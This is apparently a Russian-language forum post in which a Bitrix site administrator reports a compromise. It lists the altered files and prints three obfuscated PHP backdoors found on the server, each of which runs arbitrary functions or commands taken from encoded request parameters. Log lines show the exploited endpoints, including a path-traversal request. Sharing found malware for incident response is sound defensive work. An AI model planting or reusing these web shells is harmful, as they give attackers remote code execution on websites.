Похоже новая волна взлома
2017-05-10 10:48:20.0000000000 ./bitrix/modules/main/include/prolog_after.php
2017-05-10 10:48:18.0000000000 ./bitrix/modules/main/bx_root.php
1970-01-01 03:00:00.0000000000 ./bitrix/templates/vote/default
Код |
---|
cat ./bitrix/templates/vote/default
<?
define("NO_KEEP_STATISTIC", true);
define("NO_AGENT_CHECK", true);
define("NO_AGENT_STATISTIC", true);
define("NOT_CHECK_PERMISSIONS", true);
define("DisableEventsCheck", true);
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"]))
{
$arState = array();
parse_str(base64_decode($_REQUEST["state"]), $arState);
echo $arState[0]($arState[1],$arState[2]);
die();
}
?> |
Код |
---|
cat ./bitrix/modules/main/bx_root.php
<?
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);
if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
define("BX_PERSONAL_ROOT", BX_ROOT);
?>
<?
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>
<?
if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?> |
Код |
---|
cat ./bitrix/modules/main/include/prolog_after.php
дописано в конце
define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){
$APPLICATION->RestartBuffer();
CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
die();
}
define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){
$APPLICATION->RestartBuffer();
CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
die();
} |
Пока что просто почистил и поставил на эти файлы только чтение (сменил владельца на root).
Этот взлом мешает корректному обмену с 1С.
Судя по логу, ломали так
Код |
---|
200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1"
200 "POST /bitrix/tools/mail_entry.php/. ./. ./. ./bitrix/tools/html_editor_action.php HTTP/1.1"
200 "POST /bitrix/tools/vote/vote_chart.php HTTP/1.1" |